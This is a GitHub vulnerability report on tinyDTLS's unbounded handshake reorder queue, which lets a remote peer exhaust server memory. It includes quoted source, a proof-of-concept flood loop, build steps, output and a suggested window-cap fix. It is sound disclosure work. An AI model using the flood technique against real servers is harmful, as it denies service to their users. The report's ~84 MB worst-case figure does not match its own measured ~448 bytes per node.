Skip to content

tinydtls Unbounded Handshake Reorder Queue DoS #273

Description

@Zhaodl1

1. Report Metadata

Field Value
Project Eclipse tinyDTLS
Title Unbounded per-peer handshake reorder queue enables remote memory-exhaustion DoS
Affected component dtls.c, netq.c
Affected function handle_handshake() (reorder buffering branch)
Affected role DTLS server (posix/malloc builds)
Tested version v0.9-rc1-214-g6f4f604 (commit 6f4f604, main)
Suggested CWE CWE-400 (Uncontrolled Resource Consumption), CWE-770 (Allocation of Resources Without Limits)
Impact class Remote Denial of Service (memory exhaustion)

2. Executive Summary

Eclipse tinyDTLS maintains a per-peer reorder queue for out-of-order
DTLS handshake messages. When a handshake message arrives with a
message sequence number (mseq) greater than the expected next
sequence (mseq_r), the library allocates a new queue node via
malloc() and copies the entire message into it, intending to replay
it once the gap is filled.

There is no limit on the number of queued nodes on posix/malloc
builds. The source code contains a literal /* TODO: only add packet that are not too new. */ comment at the allocation site,
acknowledging that the bound is missing.

A remote, unauthenticated attacker who can reach the DTLS server can
send a flood of handshake messages with distinct mseq values (1
through 65535). Each message causes a malloc of up to
sizeof(netq_t) + DTLS_MAX_BUF bytes (~1348 bytes on posix). With
the maximum of 65535 distinct mseq values, a single peer can force
the server to allocate approximately 84 MB of unbounded queue
memory. An attacker creating many peers (spoofing source addresses)
can exhaust all available server memory, crashing the process or
denying service to legitimate clients.

Contiki and RIOT builds are not affected because they use a
fixed-size memory pool (NETQ_MAXCNT = 3 for PSK, 5 for ECC) that
caps the queue length.

3. Vulnerability Overview

The vulnerable code is in handle_handshake(), in the branch that
handles out-of-order messages:

@tinydtls/dtls.c:4362-4405

  uint16_t mseq = dtls_uint16_to_int(hs_header->message_seq);
  if (mseq < peer->handshake_params->hs_state.mseq_r) {
    dtls_warn("The message sequence number is too small, expected %i, got: %i\n",
	      peer->handshake_params->hs_state.mseq_r, mseq);
    return 0;
  } else if (mseq > peer->handshake_params->hs_state.mseq_r) {
    /* A packet in between is missing, buffer this packet. */
    netq_t *n;

    dtls_info("The message sequence number is too larger, expected %i, got: %i\n",
	      peer->handshake_params->hs_state.mseq_r, mseq);

    /* TODO: only add packet that are not too new. */
    if (data_length > DTLS_MAX_BUF) {
      dtls_warn("the packet is too big to buffer for reoder\n");
      return 0;
    }

    netq_t *node = netq_head(&peer->handshake_params->reorder_queue);
    while (node) {
      dtls_handshake_header_t *node_header = DTLS_HANDSHAKE_HEADER(node->data);
      if (dtls_uint16_to_int(node_header->message_seq) == mseq) {
        dtls_warn("a packet with this sequence number is already stored\n");
        return 0;
      }
      node = netq_next(node);
    }

    n = netq_node_new(data_length);
    if (!n) {
      dtls_warn("no space in reorder buffer\n");
      return 0;
    }

    n->peer = peer;
    n->length = data_length;
    memcpy(n->data, data, data_length);

    if (!netq_insert_node(&peer->handshake_params->reorder_queue, n)) {
      dtls_warn("cannot add packet to reorder buffer\n");
      netq_node_free(n);
    }
    dtls_info("Added packet %u for reordering\n", mseq);
    return 0;
  }

The flawed design is the absence of any cap on the number of nodes
in peer->handshake_params->reorder_queue. The only checks are:

  1. data_length <= DTLS_MAX_BUF (line 4375) — limits node size,
    not node count.
  2. A dedup scan (lines 4380-4388) — prevents the same mseq from
    being queued twice, but does not limit distinct mseq values.

The TODO comment at line 4374 explicitly acknowledges that packets
with "too new" mseq values should be rejected, but this was never
implemented.

The underlying allocator on posix is unbounded:

@tinydtls/netq.c:38-41

static inline netq_t *
netq_malloc_node(size_t size) {
  return (netq_t *)malloc(sizeof(netq_t) + size);
}

4. Technical Root Cause

Reachability

The reorder queue is reachable from dtls_handle_message() via the
normal handshake dispatch path:

  1. dtls_handle_message()@tinydtls/dtls.c:4627
    iterates over DTLS records.
  2. For a known peer with valid security parameters, the record is
    passed to decrypt_verify() and, if it decrypts, dispatched by
    content type.
  3. DTLS_CT_HANDSHAKE records go to handle_handshake() at
    @tinydtls/dtls.c:4777.
  4. handle_handshake() validates the handshake header
    (fragment_length + DTLS_HS_LENGTH == data_length) and then
    checks mseq against mseq_r.

Pre-authentication reachability

On the server side, the reorder path is reachable as soon as a
peer exists with handshake_params allocated. This happens after
the cookie exchange completes (handle_0_verified_client_hello()
creates handshake_params at @tinydtls/dtls.c:4238).
At that point mseq_r = 0, so any handshake message with
mseq >= 1 takes the mseq > mseq_r branch and is queued.

The attacker does not need to complete the handshake — only the
cookie exchange (one round trip). After that, the attacker can flood
thousands of out-of-order messages without ever sending the expected
mseq = 0 message.

Why the queue grows without bound

The mseq field is a 16-bit unsigned integer (uint16_t), so there
are 65536 possible values. The dedup scan only rejects exact
duplicates; it does not reject "too new" values. The TODO comment
at line 4374 was meant to add a check like
mseq - mseq_r < MAX_REORDER_WINDOW, but this was never implemented.

Memory per node

Each queued node is sizeof(netq_t) + data_length bytes. On a
64-bit posix build, sizeof(netq_t) is approximately 48 bytes
(pointers, counters, length). With data_length up to
DTLS_MAX_BUF (1400 on posix), each node can be up to ~1448 bytes.
The PoC uses 1300-byte bodies, yielding ~1348 bytes per node.

Platform dependence

  • posix/malloc (!(WITH_CONTIKI) && !(RIOT_VERSION)): unbounded
    mallocvulnerable.
  • Contiki: MEMB(netq_storage, netq_t, NETQ_MAXCNT) with
    NETQ_MAXCNT = 3 (PSK) or 5 (ECC) — not vulnerable (pool
    capped).
  • RIOT: memarray with NETQ_MAXCNT entries — not
    vulnerable
    (pool capped).

5. Proof of Concept

The PoC (poc.c) #includes dtls.c to access the static
handle_handshake() path and the peer's reorder_queue. It:

  1. Creates a DTLS context and a peer in
    DTLS_STATE_WAIT_CLIENTKEYEXCHANGE with handshake_params
    allocated and mseq_r = 0 (simulating the post-cookie state).
  2. Sends 2000 epoch-0 handshake records, each with a distinct record
    sequence number and a distinct handshake mseq (1 through 2000),
    each carrying a 1300-byte body.
  3. Counts the resulting reorder queue length and measures RSS growth.

The flood loop:

for (int i = 0; i < NUM_FLOOD_MESSAGES; i++) {
    uint16_t mseq = (uint16_t)(i + 1);   /* 1..2000, all > mseq_r=0 */
    uint64_t rseq = (uint64_t)(i + 1);

    uint8 *p = pkt;
    p = put_record_header(p, DTLS_CT_HANDSHAKE, 0, rseq, fraglen);
    p = put_handshake_header(p, DTLS_HT_CLIENT_KEY_EXCHANGE,
                             BODY_SIZE, mseq, 0, BODY_SIZE);
    memset(p, 0x41, BODY_SIZE);
    p += BODY_SIZE;

    size_t pktlen = (size_t)(p - pkt);
    dtls_handle_message(ctx, &sess, pkt, (int)pktlen);
}

Every message takes the mseq > mseq_r branch and is queued.

6. Build & Run

Working directory:
tinydtls/vuln_002_reorder_queue_dos/

cmake -B build -S .
cmake --build build -j$(nproc)
./build/vuln_poc_reorder_queue_dos

Expected output:

tinydtls PoC -- Finding 2: unbounded reorder queue DoS
=============================================================
DTLS_MAX_BUF = 1400
Flood count  = 2000 (distinct mseq values)
Platform     = posix/malloc (unbounded; Contiki/RIOT capped at NETQ_MAXCNT)

RSS before flood: 3476 KB

--- Results ---
Messages sent:          2000
Reorder queue length:   2000 nodes
Dropped (errors):       0
RSS after flood:        4352 KB
RSS increase:           876 KB
Mem per queued node:    ~448 bytes

[!] Vulnerability reproduced: reorder queue grew to 2000 nodes
    with no bound.  An attacker can exhaust server memory by
    flooding distinct mseq values (up to 65535 per peer).
    CWE-400 (Resource Exhaustion).

    Worst case per peer: 65535 nodes x ~1348 bytes = ~84 MB

Done.

Exit code: 0 (the PoC demonstrates memory growth, not a crash).

The queue grew to 2000 nodes with zero drops, consuming ~876 KB of
additional RSS. Scaling to the maximum 65535 distinct mseq values
yields ~84 MB per peer.

7. Impact

Attacker position: A remote, unauthenticated UDP peer who can
reach the DTLS server. On the server side, the attacker must first
complete a cookie exchange (one round trip) to create a peer with
handshake_params, then flood out-of-order handshake messages.

Denial of Service:

  • Per-peer memory exhaustion: A single attacker can force the
    server to allocate ~84 MB per peer by flooding all 65535 distinct
    mseq values with maximum-sized bodies.
  • Multi-peer amplification: By spoofing source addresses, the
    attacker can create many peers (each requires a cookie exchange,
    but these are stateless and cheap for the attacker). Each peer
    can independently accumulate up to 84 MB of queue memory.
    N peers × 84 MB can exhaust any server's RAM.
  • No legitimate traffic required: The attacker never sends the
    expected mseq = 0 message, so the queue is never drained. The
    memory persists until the peer times out and is destroyed.

CWE-400 (Uncontrolled Resource Consumption) / CWE-770
(Allocation of Resources Without Limits).

Severity: Medium. Requires cookie exchange (one round trip) but
no authentication. Impact is memory exhaustion leading to process
crash or degraded service. Contiki/RIOT builds are unaffected.

8. Remediation

Implement the TODO at @tinydtls/dtls.c:4374:
reject messages whose mseq is too far ahead of mseq_r.

Suggested fix — add a maximum reorder window check before the
allocation:

    /* TODO: only add packet that are not too new. */
    if (data_length > DTLS_MAX_BUF) {
      dtls_warn("the packet is too big to buffer for reoder\n");
      return 0;
    }

    /* NEW: cap the reorder window to prevent memory exhaustion. */
    #define DTLS_REORDER_WINDOW 16
    if (mseq - peer->handshake_params->hs_state.mseq_r > DTLS_REORDER_WINDOW) {
      dtls_warn("mseq %u too far ahead of expected %u, dropping\n",
                mseq, peer->handshake_params->hs_state.mseq_r);
      return 0;
    }

A window of 16 is generous for normal DTLS reordering (UDP rarely
delivers more than a few messages out of order) while bounding the
worst-case queue to 16 × ~1448 = ~23 KB per peer.

Additional hardening:

  • On posix builds, also enforce a maximum queue length (e.g. 32
    nodes) as a defense-in-depth measure, returning a fatal alert if
    exceeded.
  • Consider a global netq pool with a configurable cap even on
    posix, matching the Contiki/RIOT design.

9. References

vuln_002_reorder_queue_dos.zip

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions